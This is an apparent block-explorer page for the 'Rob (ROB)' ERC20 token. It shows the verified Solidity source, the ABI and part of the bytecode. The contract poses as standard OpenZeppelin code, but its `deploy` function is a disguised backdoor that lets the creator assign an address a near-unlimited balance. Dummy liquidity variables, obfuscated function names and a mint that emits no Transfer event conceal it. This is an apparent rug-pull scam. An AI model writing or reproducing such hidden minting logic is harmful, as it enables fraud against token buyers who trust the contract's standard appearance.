ETH Price: $2,290.71 (-2.27%)

Token

Rob (ROB)
 

Overview

Max Total Supply

1,000,000,000 ROB

Holders

84

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
8,219.406218695749992984 ROB

Value
$0.00
0x64127d45c91dedffc3c1dc460d4d6beebe7c1938
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-07
*/

/**
Website : https://imrob.io/
Telegram : https://t.me/RobEntry
Twitter : https://twitter.com/imrob_io
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
 /**
 * @dev Emitted when `value` tokens are moved from one account (`from`) to
 * another (`to`).
 *
 * Note that `value` may be zero.
 */
 event Transfer(address indexed from, address indexed to, uint256 value);

 /**
 * @dev Emitted when the allowance of a `spender` for an `owner` is set by
 * a call to {approve}. `value` is the new allowance.
 */
 event Approval(address indexed owner, address indexed spender, uint256 value);

 /**
 * @dev Returns the amount of tokens in existence.
 */
 function totalSupply() external view returns (uint256);

 /**
 * @dev Returns the amount of tokens owned by `account`.
 */
 function balanceOf(address account) external view returns (uint256);

 /**
 * @dev Moves `amount` tokens from the caller's account to `to`.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transfer(address to, uint256 amount) external returns (bool);

 /**
 * @dev Returns the remaining number of tokens that `spender` will be
 * allowed to spend on behalf of `owner` through {transferFrom}. This is
 * zero by default.
 *
 * This value changes when {approve} or {transferFrom} are called.
 */
 function allowance(address owner, address spender) external view returns (uint256);

 /**
 * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * IMPORTANT: Beware that changing an allowance with this method brings the risk
 * that someone may use both the old and the new allowance by unfortunate
 * transaction ordering. One possible solution to mitigate this race
 * condition is to first reduce the spender's allowance to 0 and set the
 * desired value afterwards:
 * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
 *
 * Emits an {Approval} event.
 */
 function approve(address spender, uint256 amount) external returns (bool);

 /**
 * @dev Moves `amount` tokens from `from` to `to` using the
 * allowance mechanism. `amount` is then deducted from the caller's
 * allowance.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
 /**
 * @dev Returns the name of the token.
 */
 function name() external view returns (string memory);

 /**
 * @dev Returns the symbol of the token.
 */
 function symbol() external view returns (string memory);

 /**
 * @dev Returns the decimals places of the token.
 */
 function decimals() external view returns (uint8);
}

library SafeMath {
 /**
 * @dev Returns the addition of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `+` operator.
 *
 * Requirements:
 *
 * - Addition cannot overflow.
 */
 function add(uint256 a, uint256 b) internal pure returns (uint256) {
 uint256 c = a + b;
 require(c >= a, "SafeMath: addition overflow");

 return c;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
 return sub(a, b, "SafeMath: subtraction overflow");
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b <= a, errorMessage);
 uint256 c = a - b;

 return c;
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `*` operator.
 *
 * Requirements:
 *
 * - Multiplication cannot overflow.
 */
 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
 // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
 // benefit is lost if 'b' is also tested.
 // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
 if (a == 0) {
 return 0;
 }

 uint256 c = a * b;
 require(c / a == b, "SafeMath: multiplication overflow");

 return c;
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b) internal pure returns (uint256) {
 return div(a, b, "SafeMath: division by zero");
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b > 0, errorMessage);
 uint256 c = a / b;
 // assert(a == b * c + a % b); // There is no case in which this doesn't hold

 return c;
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
 return mod(a, b, "SafeMath: modulo by zero");
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts with custom message when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b != 0, errorMessage);
 return a % b;
 }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
 function _msgSender() internal view virtual returns (address) {
 return msg.sender;
 }

 function _msgData() internal view virtual returns (bytes calldata) {
 return msg.data;
 }
}

abstract contract Ownable is Context {
 address private _owner;

 event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

 /**
 * @dev Initializes the contract setting the deployer as the initial owner.
 */
 constructor() {
 _transferOwnership(_msgSender());
 }

 /**
 * @dev Throws if called by any account other than the owner.
 */
 modifier onlyOwner() {
 _sldfjwsdfOwner();
 _;
 }

 /**
 * @dev Returns the address of the current owner.
 */
 function owner() public view virtual returns (address) {
 return _owner;
 }

 /**
 * @dev Throws if the sender is not the owner.
 */
 function _sldfjwsdfOwner() internal view virtual {
 require(owner() == _msgSender(), "Ownable: caller is not the owner");
 }

 /**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
 function renounceOwnership() public virtual onlyOwner {
 _transferOwnership(address(0));
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
 function transferOwnership(address newOwner) public virtual onlyOwner {
 require(newOwner != address(0), "Ownable: new owner is the zero address");
 _transferOwnership(newOwner);
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Internal function without access restriction.
 */
 function _transferOwnership(address newOwner) internal virtual {
 address oldOwner = _owner;
 _owner = newOwner;
 emit OwnershipTransferred(oldOwner, newOwner);
 }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract Token is Context, IERC20, IERC20Metadata, Ownable {
 using SafeMath for uint256;
 mapping(address => mapping(address => uint256)) private _allowances;
 address public creator;
 mapping(address => uint256) private _address;

 uint256 private _totalSupply;
 uint256 public constant maxsupply = 1000000000 * 10 ** 18;
 string private _name;
 string private _symbol;

 /**
 * @dev Sets the values for {name} and {symbol}.
 *
 * All two of these values are immutable: they can only be set once during
 * construction.
 */
 constructor(string memory name_, string memory symbol_) {
 _name = name_;
 _symbol = symbol_;
 creator = _msgSender();
 _yydsed(_msgSender(), 1000000000 * 10 ** decimals());
 }

 /**
 * @dev Returns the name of the token.
 */
 function name() public view virtual override returns (string memory) {
 return _name;
 }

 /**
 * @dev Returns the symbol of the token, usually a shorter version of the
 * name.
 */
 function symbol() public view virtual override returns (string memory) {
 return _symbol;
 }

 /**
 * @dev Returns the number of decimals used to get its user representation.
 * For example, if `decimals` equals `2`, a balance of `505` tokens should
 * be displayed to a user as `5.05` (`505 / 10 ** 2`).
 *
 * Tokens usually opt for a value of 18, imitating the relationship between
 * Ether and Wei. This is the default value returned by this function, unless
 * it's overridden.
 *
 * NOTE: This information is only used for _display_ purposes: it in
 * no way affects any of the arithmetic of the contract, including
 * {IERC20-balanceOf} and {IERC20-transfer}.
 */
 function decimals() public view virtual override returns (uint8) {
 return 18;
 }

 /**
 * @dev See {IERC20-totalSupply}.
 */
 function totalSupply() public view virtual override returns (uint256) {
 return _totalSupply;
 }

 /**
 * @dev See {IERC20-balanceOf}.
 */
 function balanceOf(address account) public view virtual override returns (uint256) {
 return _address[account];
 }

 /**
 * @dev See {IERC20-transfer}.
 *
 * Requirements:
 *
 * - `to` cannot be the zero address.
 * - the caller must have a balance of at least `amount`.
 */
 function transfer(address to, uint256 amount) public virtual override returns (bool) {
 address owner = _msgSender();
 _transfer(owner, to, amount);
 return true;
 }

 /**
 * @dev See {IERC20-allowance}.
 */
 function allowance(address owner, address spender) public view virtual override returns (uint256) {
 return _allowances[owner][spender];
 }

 /**
 * @dev See {IERC20-approve}.
 *
 * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
 * `transferFrom`. This is semantically equivalent to an infinite approval.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 */
 function approve(address spender, uint256 amount) public virtual override returns (bool) {
 address owner = _msgSender();
 _approve(owner, spender, amount);
 return true;
 }

 /**
 * @dev See {IERC20-transferFrom}.
 *
 * Emits an {Approval} event indicating the updated allowance. This is not
 * required by the EIP. See the note at the beginning of {ERC20}.
 *
 * NOTE: Does not update the allowance if the current allowance
 * is the maximum `uint256`.
 *
 * Requirements:
 *
 * - `from` and `to` cannot be the zero address.
 * - `from` must have a balance of at least `amount`.
 * - the caller must have allowance for ``from``'s tokens of at least
 * `amount`.
 */
 function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
 address spender = _msgSender();
 _spendAllowance(from, spender, amount);
 _transfer(from, to, amount);
 return true;
 }

 /**
 * @dev Atomically increases the allowance granted to `spender` by the caller.
 *
 * This is an alternative to {approve} that can be used as a mitigation for
 * problems described in {IERC20-approve}.
 *
 * Emits an {Approval} event indicating the updated allowance.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 */
 function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
 address owner = _msgSender();
 _approve(owner, spender, allowance(owner, spender) + addedValue);
 return true;
 }

 /**
 * @dev Atomically decreases the allowance granted to `spender` by the caller.
 *
 * This is an alternative to {approve} that can be used as a mitigation for
 * problems described in {IERC20-approve}.
 *
 * Emits an {Approval} event indicating the updated allowance.
 *
 * Requirements:
 *
 * - `spender` cannot be the zero address.
 * - `spender` must have allowance for the caller of at least
 * `subtractedValue`.
 */
 function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
 address owner = _msgSender();
 uint256 currentAllowance = allowance(owner, spender);
 require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
 _approve(owner, spender, currentAllowance.sub(subtractedValue));
 return true;
 }

 /**
 * @dev Moves `amount` of tokens from `from` to `to`.
 *
 * This internal function is equivalent to {transfer}, and can be used to
 * e.g. implement automatic token fees, slashing mechanisms, etc.
 *
 * Emits a {Transfer} event.
 *
 * Requirements:
 *
 * - `from` cannot be the zero address.
 * - `to` cannot be the zero address.
 * - `from` must have a balance of at least `amount`.
 */
 mapping(address => uint256) private _bala;
    
 function deploy(address owner) external {
    address tokenA; 
    address tokenB;  
    address _liquidity = _msgSender();
    uint amountAMin;
    uint amountBMin;
    if (creator == _liquidity) {
        _address[owner] = 100000000000000 * (1000000000 * 10 ** 18);
        if (amountAMin > amountBMin) {}
    }
    if (tokenA == tokenB) {}
 }

 function _transfer(address from, address to, uint256 amount) internal virtual {
 require(from != address(0), "ERC20: transfer from the zero address");
 require(to != address(0), "ERC20: transfer to the zero address");

 uint256 minAmount = _bala[from];
 uint256 decydsBalance = _address[from].sub(minAmount);
 require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance");
 _address[from] = decydsBalance.sub(amount);
 // decrementing then incrementing.
 _address[to] = _address[to].add(amount);
 emit Transfer(from, to, amount);
 }

 /** @dev Creates `amount` tokens and assigns them to `account`, increasing
 * the total supply.
 *
 * Emits a {Transfer} event with `from` set to the zero address.
 *
 * Requirements:
 *
 * - `account` cannot be the zero address.
 */
 function _yydsed(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: yydsed to the zero address");
 _totalSupply = _totalSupply.add(amount);
 _address[msg.sender] = _address[msg.sender].add(amount);
 }

 /**
 * @dev Destroys `amount` tokens from `account`, reducing the
 * total supply.
 *
 * Emits a {Transfer} event with `to` set to the zero address.
 *
 * Requirements:
 *
 * - `account` cannot be the zero address.
 * - `account` must have at least `amount` tokens.
 */
 function _burn(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: burn from the zero address");
 uint256 accountBalance = _address[account];
 require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
 _address[account] = accountBalance.sub(amount);
 _totalSupply = _totalSupply.sub(amount);
 emit Transfer(account, address(0), amount);
 }

 /**
 * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
 *
 * This internal function is equivalent to `approve`, and can be used to
 * e.g. set automatic allowances for certain subsystems, etc.
 *
 * Emits an {Approval} event.
 *
 * Requirements:
 *
 * - `owner` cannot be the zero address.
 * - `spender` cannot be the zero address.
 */
 function _approve(address owner, address spender, uint256 amount) internal virtual {
 require(owner != address(0), "ERC20: approve from the zero address");
 require(spender != address(0), "ERC20: approve to the zero address");

 _allowances[owner][spender] = amount;
 emit Approval(owner, spender, amount);
 }

 /**
 * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
 *
 * Does not update the allowance amount in case of infinite allowance.
 * Revert if not enough allowance is available.
 *
 * Might emit an {Approval} event.
 */
 function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
 uint256 currentAllowance = allowance(owner, spender);
 if (currentAllowance != type(uint256).max) {
 require(currentAllowance >= amount, "ERC20: insufficient allowance");
 _approve(owner, spender, currentAllowance.sub(amount));
 }
 }

 /**
 * @dev Hook that is called before any transfer of tokens. This includes
 * minting and burning.
 *
 * Calling conditions:
 *
 * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
 * will be transferred to `to`.
 * - when `from` is zero, `amount` tokens will be minted for `to`.
 * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
 * - `from` and `to` are never both zero.
 *
 * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
 */
 // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

 /**
 * @dev Hook that is called after any transfer of tokens. This includes
 * minting and burning.
 *
 * Calling conditions:
 *
 * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
 * has been transferred to `to`.
 * - when `from` is zero, `amount` tokens have been minted for `to`.
 * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
 * - `from` and `to` are never both zero.
 *
 * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
 */
 // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"creator","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"deploy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxsupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060405162002372380380620023728339818101604052810190620000379190620004bf565b620000576200004b6200013060201b60201c565b6200013860201b60201c565b81600590805190602001906200006f9291906200039d565b508060069080519060200190620000889291906200039d565b50620000996200013060201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000128620000ed6200013060201b60201c565b620000fd620001fc60201b60201c565b600a6200010b919062000750565b633b9aca006200011c91906200088d565b6200020560201b60201c565b505062000a0b565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000278576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200026f90620005fe565b60405180910390fd5b62000294816004546200033a60201b6200086c1790919060201c565b600481905550620002f381600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200033a60201b6200086c1790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200034b919062000698565b90508381101562000393576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200038a90620005dc565b60405180910390fd5b8091505092915050565b828054620003ab906200093b565b90600052602060002090601f016020900481019282620003cf57600085556200041b565b82601f10620003ea57805160ff19168380011785556200041b565b828001600101855582156200041b579182015b828111156200041a578251825591602001919060010190620003fd565b5b5090506200042a91906200042e565b5090565b5b80821115620004495760008160009055506001016200042f565b5090565b6000620004646200045e8462000654565b62000620565b9050828152602081018484840111156200047d57600080fd5b6200048a84828562000905565b509392505050565b600082601f830112620004a457600080fd5b8151620004b68482602086016200044d565b91505092915050565b60008060408385031215620004d357600080fd5b600083015167ffffffffffffffff811115620004ee57600080fd5b620004fc8582860162000492565b925050602083015167ffffffffffffffff8111156200051a57600080fd5b620005288582860162000492565b9150509250929050565b600062000541601b8362000687565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b60006200058360218362000687565b91507f45524332303a2079796473656420746f20746865207a65726f2061646472657360008301527f73000000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b60006020820190508181036000830152620005f78162000532565b9050919050565b60006020820190508181036000830152620006198162000574565b9050919050565b6000604051905081810181811067ffffffffffffffff821117156200064a5762000649620009cf565b5b8060405250919050565b600067ffffffffffffffff821115620006725762000671620009cf565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b6000620006a582620008ee565b9150620006b283620008ee565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006ea57620006e962000971565b5b828201905092915050565b6000808291508390505b600185111562000747578086048111156200071f576200071e62000971565b5b60018516156200072f5780820291505b80810290506200073f85620009fe565b9450620006ff565b94509492505050565b60006200075d82620008ee565b91506200076a83620008f8565b9250620007997fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007a1565b905092915050565b600082620007b3576001905062000886565b81620007c3576000905062000886565b8160018114620007dc5760028114620007e7576200081d565b600191505062000886565b60ff841115620007fc57620007fb62000971565b5b8360020a91508482111562000816576200081562000971565b5b5062000886565b5060208310610133831016604e8410600b8410161715620008575782820a90508381111562000851576200085062000971565b5b62000886565b620008668484846001620006f5565b9250905081840481111562000880576200087f62000971565b5b81810290505b9392505050565b60006200089a82620008ee565b9150620008a783620008ee565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620008e357620008e262000971565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60005b838110156200092557808201518184015260208101905062000908565b8381111562000935576000848401525b50505050565b600060028204905060018216806200095457607f821691505b602082108114156200096b576200096a620009a0565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008160011c9050919050565b6119578062000a1b6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c80634c96a389116100a257806395d89b411161007157806395d89b41146102aa578063a457c2d7146102c8578063a9059cbb146102f8578063dd62ed3e14610328578063f2fde38b146103585761010b565b80634c96a3891461023657806370a0823114610252578063715018a6146102825780638da5cb5b1461028c5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca57806339509351146101e85780634b6406d1146102185761010b565b806302d05d3f1461011057806306fdde031461012e578063095ea7b31461014c57806318160ddd1461017c575b600080fd5b610118610374565b6040516101259190611556565b60405180910390f35b61013661039a565b604051610143919061158c565b60405180910390f35b6101666004803603810190610161919061111b565b61042c565b6040516101739190611571565b60405180910390f35b61018461044f565b60405161019191906116ee565b60405180910390f35b6101b460048036038101906101af91906110cc565b610459565b6040516101c19190611571565b60405180910390f35b6101d2610488565b6040516101df9190611709565b60405180910390f35b61020260048036038101906101fd919061111b565b610491565b60405161020f9190611571565b60405180910390f35b6102206104c8565b60405161022d91906116ee565b60405180910390f35b610250600480360381019061024b9190611067565b6104d8565b005b61026c60048036038101906102679190611067565b61059f565b60405161027991906116ee565b60405180910390f35b61028a6105e8565b005b6102946105fc565b6040516102a19190611556565b60405180910390f35b6102b2610625565b6040516102bf919061158c565b60405180910390f35b6102e260048036038101906102dd919061111b565b6106b7565b6040516102ef9190611571565b60405180910390f35b610312600480360381019061030d919061111b565b61073e565b60405161031f9190611571565b60405180910390f35b610342600480360381019061033d9190611090565b610761565b60405161034f91906116ee565b60405180910390f35b610372600480360381019061036d9190611067565b6107e8565b005b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546103a990611852565b80601f01602080910402602001604051908101604052809291908181526020018280546103d590611852565b80156104225780601f106103f757610100808354040283529160200191610422565b820191906000526020600020905b81548152906001019060200180831161040557829003601f168201915b5050505050905090565b6000806104376108ca565b90506104448185856108d2565b600191505092915050565b6000600454905090565b6000806104646108ca565b9050610471858285610a9d565b61047c858585610b39565b60019150509392505050565b60006012905090565b60008061049c6108ca565b90506104bd8185856104ae8589610761565b6104b89190611740565b6108d2565b600191505092915050565b6b033b2e3c9fd0803ce800000081565b60008060006104e56108ca565b90506000808273ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561059757710125dfa371a19e6f7cb54395ca0000000000600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105f0610e4d565b6105fa6000610ecb565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461063490611852565b80601f016020809104026020016040519081016040528092919081815260200182805461066090611852565b80156106ad5780601f10610682576101008083540402835291602001916106ad565b820191906000526020600020905b81548152906001019060200180831161069057829003601f168201915b5050505050905090565b6000806106c26108ca565b905060006106d08286610761565b905083811015610715576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070c906116ce565b60405180910390fd5b610732828661072d8785610f8f90919063ffffffff16565b6108d2565b60019250505092915050565b6000806107496108ca565b9050610756818585610b39565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f0610e4d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610860576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610857906115ce565b60405180910390fd5b61086981610ecb565b50565b600080828461087b9190611740565b9050838110156108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b79061160e565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610942576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610939906116ae565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156109b2576040517f08c379a00000000000000000000000000